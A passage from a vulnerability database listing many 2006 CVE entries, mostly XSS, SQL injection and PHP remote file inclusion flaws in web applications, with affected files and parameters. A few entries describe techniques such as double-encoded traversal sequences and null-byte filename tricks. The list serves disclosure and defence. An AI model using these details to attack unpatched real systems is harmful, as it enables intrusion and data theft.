vulnerabilities in phpcards.footer.php in phpCards 1.3 allow remote attackers to inject arbitrary web script or HTML via the CardFontFace parameter and other unspecified parameters. [CVE-2006-5600] Axalto Protiva 1.1, possibly only non-commercial versions, stores passwords in plaintext in files with insecure permissions, which allows local users to gain privileges by reading the passwords from (1) KeyTool\keytool.config or (2) webapps\protiva\WEB-INF\classes\authserver.config. [CVE-2006-5599] Cross-site scripting (XSS) vulnerability in Oracle Application Express (formerly HTML DB) before 2.2.1 allows remote attackers to inject arbitrary HTML or web script via the WWV_FLOW_ITEM_HELP package. NOTE: it is likely that this issue overlaps one of the Oracle VulnIDs covered by CVE-2006-5351. Oracle has not publicly disputed claims by a reliable researcher that this has been fixed by the October 2006 CPU. [CVE-2006-5598] Cross-site scripting (XSS) vulnerability in index.php for GOOP Gallery 2.0, and possibly other versions before 2.0.3, allows remote attackers to inject arbitrary HTML or web script via the image parameter. [CVE-2006-5597] join.asp in MiniHTTP Web Forum & File Server PowerPack 4.0 allows remote attackers to add or modify arbitrary user accounts via modified (1) frmMailBox and (2) frmUserPass parameters. [CVE-2006-5587] Multiple PHP remote file inclusion vulnerabilities in MDweb 1.3 and earlier (Mdweb132-postgres) allow remote attackers to execute arbitrary PHP code via a URL in the chemin_appli parameter in (1) admin/inc/organisations/form_org.inc.php and (2) admin/inc/organisations/country_insert.php. [CVE-2006-5574] Unspecified vulnerability in the Brazilian Portuguese Grammar Checker in Microsoft Office 2003 and the Multilingual Interface for Office 2003, Project 2003, and Visio 2003 allows user-assisted remote attackers to execute arbitrary code via crafted text that is not properly parsed. [CVE-2006-5564] Cross-site scripting (XSS) vulnerability in user.php in MAXdev MD-Pro 1.0.76 allows remote attackers to inject arbitrary web script or HTML via the op parameter. NOTE: the provenance of this information is unknown [CVE-2006-5560] Cross-site scripting (XSS) vulnerability in heading.php in Boesch ProgSys 0.151 and earlier allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/index.php, and unspecified vectors related to certain other files. NOTE: some of these details are obtained from third party information. [CVE-2006-5537] Multiple cross-site scripting (XSS) vulnerabilities in cgi-bin/webcm in D-Link DSL-G624T firmware 3.00B01T01.YA-C.20060616 allow remote attackers to inject arbitrary web script or HTML via the (1) upnp:settings/state or (2) upnp:settings/connection parameters. [CVE-2006-5536] Directory traversal vulnerability in cgi-bin/webcm in D-Link DSL-G624T firmware 3.00B01T01.YA-C.20060616 allows remote attackers to read arbitrary files via a .. (dot dot) in the getpage parameter. [CVE-2006-5535] Multiple cross-site scripting (XSS) vulnerabilities in WebHostManager (WHM) 10.8.0 cPanel 10.9.0 R50 allow remote attackers to inject arbitrary web script or HTML via the (1) theme parameter to scripts/dosetmytheme and the (2) template parameter to scripts2/editzonetemplate. [CVE-2006-5534] Multiple cross-site scripting (XSS) vulnerabilities in index.htm in Zwahlen Online Shop Freeware 5.2.2.50, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) cat, (2) Kat, (3) id, or (4) no parameters. NOTE: some of these details are obtained from third party information. [CVE-2006-5532] Cross-site scripting (XSS) vulnerability in rmgs/images.php in RMSOFT Gallery System 2.0 allows remote attackers to inject arbitrary web script or HTML via the kw parameter. NOTE: some of these details are obtained from third party information. [CVE-2006-5530] Multiple cross-site scripting (XSS) vulnerabilities in Boesch SimpNews before 2.34.01 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) admin/index.php, (2) admin/pwlost.php, and unspecified other files. NOTE: the provenance of this information is unknown [CVE-2006-5529] Cross-site scripting (XSS) vulnerability in smumdadotcom_ascyb_alumni/mod.php in SchoolAlumni Portal 2.26 allows remote attackers to inject arbitrary web script or HTML via the query parameter in a search operation in the katalog module. NOTE: some of these details are obtained from third party information. [CVE-2006-5524] Cross-site scripting (XSS) vulnerability in index.php in phplist 2.10.2 allows remote attackers to inject arbitrary web script or HTML via the p parameter. NOTE: This issue might overlap CVE-2006-5321. [CVE-2006-5516] Multiple cross-site scripting (XSS) vulnerabilities in actions/usersettings.php in WikiNi before 0.4.4 allow remote attackers to inject arbitrary web script or HTML via the (1) name and (2) email parameters to wakka.php. [CVE-2006-5514] SQL injection vulnerability in quiz.php in Web Group Communication Center (WGCC) 0.5.6b and earlier allows remote attackers to execute arbitrary SQL commands via the qzid parameter. [CVE-2006-5512] Cross-site scripting (XSS) vulnerability in article.htm in Zwahlen Online Shop allows remote attackers to inject arbitrary web script or HTML via the cat parameter. [CVE-2006-5511] Direct static code injection vulnerability in delete.php in JaxUltraBB (JUBB) 2.0, when register_globals is enabled, allows remote attackers to inject arbitrary web script, HTML, or PHP via the contents parameter, whose value is prepended to the file specified by the forum parameter. [CVE-2006-5504] Cross-site scripting (XSS) vulnerability in index.php in Simple Machines Forum (SMF) allows remote attackers to inject arbitrary web script or HTML via a base64 encoded params value in the action parameter. [CVE-2006-5503] Cross-site scripting (XSS) vulnerability in index.php in Simple Machines Forum (SMF) 1.1 RC2 allows remote attackers to inject arbitrary web script or HTML via the action parameter. [CVE-2006-5500] Multiple SQL injection vulnerabilities in the checkUser function in inc/DBInterface.php in XchangeBoard 1.70 and earlier, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) userNick or (2) password parameters. NOTE: the provenance of this information is unknown [CVE-2006-5499] Multiple cross-site scripting (XSS) vulnerabilities in Serendipity (s9y) 1.0.1 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors in the media manager administration page. [CVE-2006-5496] Multiple cross-site scripting (XSS) vulnerabilities in Timothy Claason KnowledgeBank 1.01 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) index.php, (2) addknowledge.php, and (3) addscreenshot.php. [CVE-2006-5495] Multiple PHP remote file inclusion vulnerabilities in Trawler Web CMS 1.8.1 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) path_red2 parameter to (a) _msdazu_pdata/redaktion/artikel/up/index.php [CVE-2006-5486] Cross-site scripting (XSS) vulnerability in Webmail in Sun Java System Messaging Server 6.0 through 6.2 and iPlanet Messaging Server 5.2 allows remote attackers to execute arbitrary Javascript via crafted messages. [CVE-2006-5481] Multiple PHP remote file inclusion vulnerabilities in 2le.net Castor PHP Web Builder 1.1.1 allow remote attackers to execute arbitrary PHP code via the rootpath parameter in (1) lib/code.php, (2) lib/dbconnect.php, (3) lib/error.php, (4) lib/menu.php, and other unspecified files. NOTE: the provenance of this information is unknown [CVE-2006-5480] PHP remote file inclusion vulnerability in lib/rs.php in 2le.net Castor PHP Web Builder 1.1.1 allows remote attackers to execute arbitrary PHP code via the rootpath parameter. [CVE-2006-5475] Multiple cross-site scripting (XSS) vulnerabilities in the XML parser in Drupal 4.6.x before 4.6.10 and 4.7.x before 4.7.4 allow remote attackers to inject arbitrary web script or HTML via a crafted RSS feed. [CVE-2006-5457] Multiple cross-site scripting (XSS) vulnerabilities in the registration form in Casinosoft Casino Script (Masvet) 3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) surname field. [CVE-2006-5453] Multiple cross-site scripting (XSS) vulnerabilities in Bugzilla 2.18.x before 2.18.6, 2.20.x before 2.20.3, 2.22.x before 2.22.1, and 2.23.x before 2.23.3 allow remote authenticated users to inject arbitrary web script or HTML via (1) page headers using the H1, H2, and H3 HTML tags in global/header.html.tmpl, (2) description fields of certain items in various edit cgi scripts, and (3) the id parameter in showdependencygraph.cgi. [CVE-2006-5451] Multiple cross-site scripting (XSS) vulnerabilities in TorrentFlux 2.1 allow remote attackers to inject arbitrary web script or HTML via the (1) action, (2) file, and (3) users array variables in (a) admin.php, which are not properly handled when the administrator views the Activity Log [CVE-2006-5447] Cross-site scripting (XSS) vulnerability in index.php in DEV Web Management System (WMS) 1.5 allows remote attackers to inject arbitrary web script or HTML via the action parameter. [CVE-2006-5441] PHP remote file inclusion vulnerability in adminfoot.php in Comdev Web Blogger 4.1, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the path[docroot] parameter. NOTE: the provenance of this information is unknown [CVE-2006-5430] Cross-site scripting (XSS) vulnerability in the search functionality in db-central (dbc) Enterprise CMS and db-central CMS allows remote attackers to inject arbitrary web script or HTML via the needle parameter. NOTE: the provenance of this information is unknown [CVE-2006-5416] Cross-site scripting (XSS) vulnerability in my.acctab.php3 in F5 Networks FirePass 1000 SSL VPN 5.5, and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via the sid parameter. [CVE-2006-5411] Unrestricted file upload vulnerability in upload.php for Free Web Publishing System (FreeWPS), possibly 2.11 and earlier, allows remote attackers to upload and execute arbitrary PHP programs. [CVE-2006-5409] Multiple SQL injection vulnerabilities in the wireless IDS management interface for Highwall Enterprise and Highwall Endpoint 4.0.2.11045 allow remote attackers to execute arbitrary SQL commands via unspecified vectors. [CVE-2006-5388] SQL injection vulnerability in index.php in WebSPELL 4.01.01 and earlier allows remote attackers to execute arbitrary SQL commands via the getsquad parameter, a different vector than CVE-2006-4783. [CVE-2006-5386] PHP remote file inclusion vulnerability in process.php in NuralStorm Webmail 0.98b and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the DEFAULT_SKIN parameter. [CVE-2006-5381] Contenido CMS stores sensitive data under the web root with insufficient access control, which allows remote attackers to obtain database credentials and other information via a direct request to (1) db_msql.inc, (2) db_mssql.inc, (3) db_mysqli.inc, (4) db_oci8.inc, (5) db_odbc.inc, (6) db_oracle.inc, (7) db_pgsql.inc, or (8) db_sybase.inc in the conlib/ directory. [CVE-2006-5330] CRLF injection vulnerability in Adobe Flash Player plugin 9.0.16 and earlier for Windows, 7.0.63 and earlier for Linux, 7.x before 7.0 r67 for Solaris, and before 9.0.28.0 for Mac OS X, allows remote attackers to modify HTTP headers of client requests and conduct HTTP Request Splitting attacks via CRLF sequences in arguments to the ActionScript functions (1) XML.addRequestHeader and (2) XML.contentType. NOTE: the flexibility of the attack varies depending on the type of web browser being used. [CVE-2006-5324] The Web Services Notification (WSN) security component of IBM WebSphere Application Server before 6.1.0.2 allows attackers to obtain unspecified access without supplying a username and password, aka PK28374. [CVE-2006-5323] Unspecified vulnerability in IBM WebSphere Application Server before 6.1.0.2 has unspecified impact and attack vectors, related to a "possible security exposure," aka PK29360. [CVE-2006-5321] Multiple cross-site scripting (XSS) vulnerabilities in phplist before 2.10.3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-5318] PHP remote file inclusion vulnerability in index.php in Nayco JASmine (aka Jasmine-Web) allows remote attackers to execute arbitrary PHP code via an FTP URL in the section parameter. [CVE-2006-5316] registroTL stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for /usuarios.dat. [CVE-2006-5303] Secure Computing SafeWord RemoteAccess 2.1 allows local users to obtain the UserCenter webportal password, database encryption keys, and signing keys by reading (1) base-64 encoded data in SERVERS\Web\Tomcat\usercenter\WEB-INF\login.conf and (2) plaintext data in SERVERS\Shared\signers.cfg. NOTE: the provenance of this information is unknown [CVE-2006-5299] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Gcontact 0.6.5 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-5294] Cross-site scripting (XSS) vulnerability in index.php in phplist before 2.10.3 allows remote attackers to inject arbitrary web script or HTML via the unsubscribeemail parameter. [CVE-2006-5293] Cross-site scripting (XSS) vulnerability in index.php in PhpOutsourcing Noah's Classifieds 1.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the frommethod parameter. [CVE-2006-5290] The ESS/ Network Controller and MicroServer Web Server components of Xerox WorkCentre and WorkCentre Pro 232, 238, 245, 255, 265 and 275 allow remote attackers to bypass authentication and execute arbitrary code via "WebUI command injection on TCP/IP hostname." [CVE-2006-5269] Heap-based buffer overflow in an unspecified procedure in Trend Micro ServerProtect 5.7 and 5.58 allows remote attackers to execute arbitrary code via unknown vectors, probably related to an RPC interface. [CVE-2006-5268] Unspecified vulnerability in Trend Micro ServerProtect 5.7 and 5.58 allows remote attackers to execute arbitrary code via vectors related to obtaining "administrative access to the RPC interface." [CVE-2006-5264] Cross-site scripting (XSS) vulnerability in sql.php in MysqlDumper 1.21 b6 allows remote attackers to inject arbitrary web script or HTML via the db parameter. [CVE-2006-5258] The spell checking component of (1) Asbru Web Content Management before 6.1.22, (2) Asbru Web Content Editor before 6.0.22, and (3) Asbru Website Manager before 6.0.22 allows remote attackers to execute arbitrary commands via an unspecified parameter that is not sanitized before Aspell is invoked. [CVE-2006-5252] PHP remote file inclusion vulnerability in includes/core.lib.php in Webmedia Explorer 2.8.7 allows remote attackers to execute arbitrary PHP code via a URL in the path_include parameter. [CVE-2006-5248] Eazy Cart stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a customer database via a direct request for admin/config/customer.dat. NOTE: the provenance of this information is unknown [CVE-2006-5247] Multiple cross-site scripting (XSS) vulnerabilities in Eazy Cart allow remote attackers to inject arbitrary web script or HTML via easycart.php, possibly related to the (1) des and (2) qty parameters in an add action, and via other unspecified vectors. NOTE: some details are obtained from third party information. [CVE-2006-5239] Multiple cross-site scripting (XSS) vulnerabilities in eXpBlog 0.3.5 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the query string (PHP_SELF) in kalender.php or (2) the captcha_session_code parameter in pre_details.php. [CVE-2006-5234] DISPUTED Multiple PHP remote file inclusion vulnerabilities in phpWebSite 0.10.2 allow remote attackers to execute arbitrary PHP code via a URL in the PHPWS_SOURCE_DIR parameter in (1) init.php, (2) users.php, (3) Cookie.php, (4) forms.php, (5) Groups.php, (6) ModSetting.php, (7) Calendar.php, (8) DateTime.php, (9) core.php, (10) ImgLibrary.php, (11) Manager.php, and (12) Template.php, and (13) EZform.php. NOTE: CVE disputes this report, since "PHPWS_SOURCE_DIR" is defined as a constant, not accessed as a variable. [CVE-2006-5227] Cross-site scripting (XSS) vulnerability in admin.php in TorrentFlux 2.1 allows remote attackers to inject arbitrary web script or HTML via (1) the $user_agent variable, probably obtained from the User-Agent HTTP header, and possibly (2) the $ip_resolved variable. [CVE-2006-5220] Multiple PHP remote file inclusion vulnerabilities in WebYep 1.1.9, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via the webyep_sIncludePath in (1) files in the programm/lib/ directory including (a) WYApplication.php, (b) WYDocument.php, (c) WYEditor.php, (d) WYElement.php, (e) WYFile.php, (f) WYHTMLTag.php, (g) WYImage.php, (h) WYLanguage.php, (i) WYLink.php, (j) WYPath.php, (k) WYPopupWindowLink.php, (l) WYSelectMenu.php, and (m) WYTextArea.php [CVE-2006-5210] Directory traversal vulnerability in IronWebMail before 6.1.1 HotFix-17 allows remote attackers to read arbitrary files via a GET request to the IM_FILE identifier with double-url-encoded "../" sequences ("%252e%252e/"). [CVE-2006-5204] Cross-site scripting (XSS) vulnerability in action_admin/member.php in Invision Power Board (IPB) 2.1.7 and earlier allows remote authenticated users to inject arbitrary web script or HTML via a reference to a script in the avatar setting, which can be leveraged for a cross-site request forgery (CSRF) attack involving forced SQL execution by an admin. [CVE-2006-5203] Invision Power Board (IPB) 2.1.7 and earlier allows remote restricted administrators to inject arbitrary web script or HTML, or execute arbitrary SQL commands, via a forum description that contains a crafted image with PHP code, which is executed when the user visits the "Manage Forums" link in the Admin control panel. [CVE-2006-5197] PDshopPro stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for (1) /pdshoppro.mdb, (2) /data/pdshoppro.mdb, or (3) /shoppro/data/pdshoppro.mdb. [CVE-2006-5196] The HTTP interface in the Motorola SURFboard SB4200 Cable Modem allows remote attackers to cause a denial of service (device crash) via a request with MfcISAPICommand set to SecretProc and a long string in the Secret parameter. [CVE-2006-5195] Multiple cross-site scripting (XSS) vulnerabilities in Wheatblog 1.0 and 1.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: the provenance of this information is unknown [CVE-2006-5194] Cross-site scripting (XSS) vulnerability in index.php in net2ftp 0.93 allows remote attackers to inject arbitrary web script or HTML via the username parameter. NOTE: some of these details are obtained from third party information. [CVE-2006-5190] Multiple cross-site scripting (XSS) vulnerabilities in osCommerce 2.2 Milestone 2 Update 060817 allow remote attackers to inject arbitrary web script or HTML via the (1) page parameter in the (a) banner_manager.php, (b) banner_statistics.php, (c) countries.php, (d) currencies.php, (e) languages.php, (f) manufacturers.php, (g) newsletters.php, (h) orders_status.php, (i) products_attributes.php, (j) products_expected.php, (k) reviews.php, (l) specials.php, (m) stats_products_purchased.php, (n) stats_products_viewed.php, (o) tax_classes.php, (p) tax_rates.php, or (q) zones.php scripts in /admin, and the (2) zpage parameter in (r) admin/geo_zones.php. [CVE-2006-5188] Directory traversal vulnerability in download.php in webGENEius GOOP Gallery 2.0.2 allows remote attackers to read or list data from certain files or directories via unspecified vectors. [CVE-2006-5181] Multiple PHP remote file inclusion vulnerabilities in Joshua Muheim phpMyWebmin 1.0 allow remote attackers to execute arbitrary PHP code via a URL in the target parameter in (1) change_preferences2.php, (2) create_file.php, (3) upload_local.php, and (4) upload_multi.php, different vectors than CVE-2006-5124. [CVE-2006-5175] Cross-site request forgery (CSRF) vulnerability in the administrative interface for the TeraStation HD-HTGL firmware 2.05 beta 1 and earlier allows remote attackers to modify configurations or delete arbitrary data via unspecified vectors. [CVE-2006-5172] Stack-based buffer overflow in the RPC interface in Mediasvr.exe in Computer Associates (CA) Brightstor ARCserve Backup 9.01 through 11.5, Enterprise Backup 10.5, and CA Protection Suites r2 allows remote attackers to execute arbitrary code via crafted SUNRPC packets, aka the "Mediasvr.exe String Handling Overflow," a different vulnerability than CVE-2006-5171. [CVE-2006-5171] Stack-based buffer overflow in the RPC interface in Mediasvr.exe in Computer Associates (CA) Brightstor ARCserve Backup 9.01 through 11.5, Enterprise Backup 10.5, and CA Protection Suites r2 allows remote attackers to execute arbitrary code via crafted SUNRPC packets, aka the "Mediasvr.exe Overflow," a different vulnerability than CVE-2006-5172. [CVE-2006-5169] Cross-site scripting (XSS) vulnerability in John Himmelman (aka DaRk2k1) PowerPortal 1.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly related to registering a user. NOTE: the provenance of this information is unknown [CVE-2006-5168] Cross-site scripting (XSS) vulnerability in the search functionality in Simon Brown Pebble 2.0.0 RC1 and RC2 allows remote attackers to inject arbitrary web script or HTML via the query string. [CVE-2006-5166] PHP remote file inclusion vulnerability in functions.php in PHP Web Scripts Easy Banner Free allows remote attackers to execute arbitrary PHP code via a URL in the s[phppath] parameter. [CVE-2006-5164] Multiple cross-site scripting (XSS) vulnerabilities in cart.php in Sum Effect Software digiSHOP 4.0 allow remote attackers to inject arbitrary web script or HTML via the (1) sortBy or (2) search parameters. [CVE-2006-5161] IBM Client Security Password Manager stores and distributes saved passwords based upon the title of a website, which allows remote attackers to obtain username and password credentials by changing the title of an HTML page. [CVE-2006-5152] Cross-site scripting (XSS) vulnerability in Microsoft Internet Explorer allows remote attackers to inject arbitrary web script or HTML via a UTF-7 encoded URL that is returned in a large HTTP 404 error message without an explicit charset, a related issue to CVE-2006-0032. [CVE-2006-5147] PHP remote file inclusion vulnerability in wamp_dir/setup/yesno.phtml in VAMP Webmail 2.0beta1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the no_url parameter. [CVE-2006-5146] Multiple cross-site scripting (XSS) vulnerabilities in Yblog allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter in (a) funk.php, or the (2) action parameter in (b) tem.php and (c) uss.php. [CVE-2006-5144] Cross-site scripting (XSS) vulnerability in userupload.php in OlateDownload 3.4.0 allows remote attackers to inject arbitrary web script or HTML via the description_small parameter. [CVE-2006-5139] Unspecified vulnerability in MkPortal allows remote attackers to corrupt web site content, and possibly have other impact, via a certain long Message that affects "Tables," related to the Urlobox. [CVE-2006-5134] Mercury SiteScope 8.2 (8.1.2.0) allows remote authenticated users to cause a denial of service (loss of connectivity to the classic interface) via attempted HTML injection into the "new monitor description" field. [CVE-2006-5130] Multiple cross-site scripting (XSS) vulnerabilities in ph03y3nk just another flat file (JAF) CMS 4.0 RC1 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) url, (3) title, and (4) about parameters in a forum post. NOTE: the provenance of this information is unknown [CVE-2006-5129] Multiple cross-site scripting (XSS) vulnerabilities in ph03y3nk just another flat file (JAF) CMS 4.0 RC1 allow remote attackers to inject arbitrary web script or HTML via (1) the message parameter, and possibly other parameters, in module/shout/jafshout.php (aka the shoutbox) [CVE-2006-5127] Multiple cross-site scripting (XSS) vulnerabilities in Bartels Schoene ConPresso before 4.0.5a allow remote attackers to inject arbitrary web script or HTML via (1) the nr parameter in detail.php, (2) the msg parameter in db_mysql.inc.php, and (3) the pos parameter in index.php. [CVE-2006-5125] Directory traversal vulnerability in window.php, possibly used by home.php, in Joshua Muheim phpMyWebmin 1.0 allows remote attackers to obtain sensitive information via a directory name in the target parameter, which triggers a directory listing through the opendir function. [CVE-2006-5124] Multiple PHP remote file inclusion vulnerabilities in Joshua Muheim phpMyWebmin 1.0 allow remote attackers to execute arbitrary PHP code via a URL in the (1) target and (2) action parameters in window.php, and possibly the (3) target parameter in home.php. [CVE-2006-5122] Multiple cross-site scripting (XSS) vulnerabilities in Mercury SiteScope 8.2 (8.1.2.0) allow remote authenticated users to inject arbitrary web script or HTML via (1) "any field create name field" except "create new group name" or (2) any description field. [CVE-2006-5120] Multiple cross-site scripting (XSS) vulnerabilities in Scott Metoyer Red Mombin 0.7 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to (1) index.php and (2) process_login.php. [CVE-2006-5119] Multiple cross-site scripting (XSS) vulnerabilities in Zen Cart 1.3.5 allow remote attackers to inject arbitrary web script or HTML via the (1) admin_name or (2) admin_pass parameter in (a) admin/login.php, or the (3) admin_email parameter in (b) admin/password_forgotten.php. [CVE-2006-5118] PHP remote file inclusion vulnerability in index.php3 in the PDD package for PHPSelect Web Development Division allows remote attackers to execute arbitrary PHP code via a URL in the Application_Root parameter. [CVE-2006-5117] phpMyAdmin before 2.9.1-rc1 has a libraries directory under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information via direct requests for certain files. [CVE-2006-5114] Multiple cross-site scripting (XSS) vulnerabilities in wgate in SAP Internet Transaction Server (ITS) 6.1 and 6.2 allow remote attackers to inject arbitrary web script or HTML via the (1) ~urlmime or (2) ~command parameter, different vectors than CVE-2003-0749. [CVE-2006-5112] Buffer overflow in InterVations NaviCOPA Web Server 2.01 allows remote attackers to execute arbitrary code via a long HTTP GET request. [CVE-2006-5110] Cross-site scripting (XSS) vulnerability in home.php in PHP Invoice 2.2 allows remote attackers to inject arbitrary web script or HTML via the msg parameter, a different vector than CVE-2006-5074. NOTE: the provenance of this information is unknown [CVE-2006-5108] Multiple cross-site scripting (XSS) vulnerabilities in Devellion CubeCart 2.0.x allow remote attackers to inject arbitrary web script or HTML via the order_id parameter in (1) admin/print_order.php and (2) view_order.php [CVE-2006-5106] Cross-site scripting (XSS) vulnerability in FacileForms before 1.4.7 for Mambo and Joomla!, when either register_globals or RG_EMULATION is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-5101] PHP remote file inclusion vulnerability in include.php in Comdev CSV Importer 3.1 and possibly 4.1, as used in (1) Comdev Contact Form 3.1, (2) Comdev Customer Helpdesk 3.1, (3) Comdev Events Calendar 3.1, (4) Comdev FAQ Support 3.1, (5) Comdev Guestbook 3.1, (6) Comdev Links Directory 3.1, (7) Comdev News Publisher 3.1, (8) Comdev Newsletter 3.1, (9) Comdev Photo Gallery 3.1, (10) Comdev Vote Caster 3.1, (11) Comdev Web Blogger 3.1, and (12) Comdev eCommerce 3.1, allows remote attackers to execute arbitrary PHP code via a URL in the path[docroot] parameter. NOTE: it has been reported that 4.1 versions might also be affected. [CVE-2006-5100] PHP remote file inclusion vulnerability in parse/parser.php in WEB//NEWS (aka webnews) 1.4 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the WN_BASEDIR parameter. [CVE-2006-5096] Multiple cross-site scripting (XSS) vulnerabilities in index.php in VirtueMart (formerly known as mambo-phpShop) Joomla! eCommerce Edition CMS 1.0.11, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the Itemid parameter in a (1) com_contact or (2) subscribe action. [CVE-2006-5090] Multiple cross-site scripting (XSS) vulnerabilities in Phoenix Evolution CMS (PECMS) allow remote attackers to inject arbitrary web script or HTML via the (1) mod or (2) action parameters in index.php, or the (3) pageid parameter in modules/pageedit/index.php. NOTE: the provenance of this information is unknown [CVE-2006-5080] Cross-site scripting (XSS) vulnerability in the search function in Six Apart Movable Type 3.3 to 3.32, and Movable Type Enterprise 1.01 and 1.02, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-5074] Cross-site scripting (XSS) vulnerability in home.php in PHP Invoice 2.2 allows remote attackers to inject arbitrary web script or HTML via the alert parameter. [CVE-2006-5071] Multiple cross-site scripting (XSS) vulnerabilities in eyeOS before 0.9.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) eyeNav and (2) system/baixar.php. [CVE-2006-5069] Cross-site scripting (XSS) vulnerability in class.tx_indexedsearch.php in the Indexed Search 2.9.0 extension for Typo3 before 4.0.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the search parameter. [CVE-2006-5066] Multiple cross-site scripting (XSS) vulnerabilities in DanPHPSupport 0.5, and other versions before 1.0, allow remote attackers to inject arbitrary web script or HTML via the (1) page parameter in index.php or the (2) do parameter in admin.php. [CVE-2006-5064] Multiple cross-site scripting (XSS) vulnerabilities in BirdBlog 1.4 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) entryid parameter in comment.php, (2) page parameter in index.php, or the (3) uid parameter in user.php. NOTE: the provenance of this information is unknown [CVE-2006-5063] Cross-site scripting (XSS) vulnerability in Elog 2.6.1 allows remote attackers to inject arbitrary web script or HTML by editing log entries in HTML mode. [CVE-2006-5060] Cross-site scripting (XSS) vulnerability in login.php in Jamroom 3.0.16 and possibly earlier allows remote attackers to inject arbitrary web script or HTML via the forgot parameter in the forgot mode. [CVE-2006-5059] Multiple cross-site scripting (XSS) vulnerabilities in WWWthreads 5.4.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the Cat parameter to (1) dosearch.php, (2) postlist.php, (3) showmembers.php, (4) faq_english.php, (5) online.php, (6) login.php, (7) newuser.php, (8) wwwthreads.php, (9) search.php, or (10) postlist.php. [CVE-2006-5057] Multiple cross-site scripting (XSS) vulnerabilities in Ktools.net PhotoStore allow remote attackers to inject arbitrary web script or HTML via the (1) gid parameter in details.php, or the (2) photogid parameter in view_photog.php. [CVE-2006-5056] Cross-site scripting (XSS) vulnerability in index.php in Opial Audio/Video Download Management 1.0 allows remote attackers to inject arbitrary web script or HTML via the destination parameter in the Login view. [CVE-2006-5053] PHP remote file inclusion vulnerability in webnews/template.php in Web-News 1.6.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the content_page parameter. [CVE-2006-5035] Multiple cross-site scripting (XSS) vulnerabilities in Paul Smith Computer Services vCAP 1.7.0 allow remote attackers to inject arbitrary web script or HTML via (1) the statusmsg parameter in RegisterPage.cgi or (2) a URI corresponding to a nonexistent file. NOTE: the provenance of this information is unknown [CVE-2006-5031] Directory traversal vulnerability in app/webroot/js/vendors.php in Cake Software Foundation CakePHP before 1.1.8.3544 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, followed by a filename ending with "%00" and a .js filename. [CVE-2006-5023] SQL injection vulnerability in kategori.asp in xweblog 2.1 and earlier allows remote attackers to execute arbitrary SQL commands via the kategori parameter. [CVE-2006-5020] Multiple PHP remote file inclusion vulnerabilities in SolidState 0.4 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the base_path parameter in manager/pages/ scripts including (1) AccountsPage.class.php, (2) AddInvoicePage.class.php, (3) AddIPAddressPage.class.php, (4) AddPaymentPage.class.php, (5) AddTaxRulePage.class.php, (6) AssignDomainPage.class.php, (7) AssignHostingPage.class.php, (8) AssignProductPage.class.php, (9) BillingPage.class.php, (10) BillingPaymentPage.class.php, (11) BrowseAccountsPage.class.php, (12) BrowseInvoicesPage.class.php, (13) ConfigureEditUserPage.class.php, (14) ConfigureNewUserPage.class.php, (15) ConfigureNewUserReceiptPage.class.php, (16) ConfigureUsersPage.class.php, (17) DeleteAccountPage.class.php, (18) DeleteDomainServicePage.class.php, (19) DeleteHostingServicePage.class.php, (20) DeleteInvoicePage.class.php, (21) DeleteProductPage.class.php, (22) DeleteServerPage.class.php, (23) DomainServicesPage.class.php, (24) DomainsPage.class.php, (25) EditAccountPage.class.php, (26) EditDomainPage.class.php, (27) EditDomainServicePage.class.php, (28) EditHostingServicePage.class.php, (29) EditPaymentPage.class.php, (30) EditProductPage.class.php, (31) EditServerPage.class.php, (32) EmailInvoicePage.class.php, (33) ExecuteOrderPage.class.php, (34) ExpiredDomainsPage.class.php, (35) FulfilledOrdersPage.class.php, (36) GenerateInvoicesPage.class.php, (37) HomePage.class.php, (38) InactiveAccountsPage.class.php, (39) IPManagerPage.class.php, (40) LoginPage.class.php, (41) LogPage.class.php, (42) ModulesPage.class.php, (43) NewAccountPage.class.php, (44) NewDomainServicePage.class.php, (45) NewProductPage.class.php, (46) OutstandingInvoicesPage.class.php, (47) PendingAccountsPage.class.php, (48) PendingOrdersPage.class.php, (49) PrintInvoicePage.class.php, (50) ProductsPage.class.php, (51) RegisterDomainPage.class.php, (52) RegisteredDomainsPage.class.php, (53) ServersPage.class.php, (54) ServicesHostingServicesPage.class.php, (55) ServicesNewHostingPage.class.php, (56) ServicesPage.class.php, (57) ServicesWebHostingPage.class.php, (58) SettingsPage.class.php, (59) TaxesPage.class.php, (60) TransferDomainPage.class.php, (61) ViewAccountPage.class.php, (62) ViewDomainServicePage.class.php, (63) 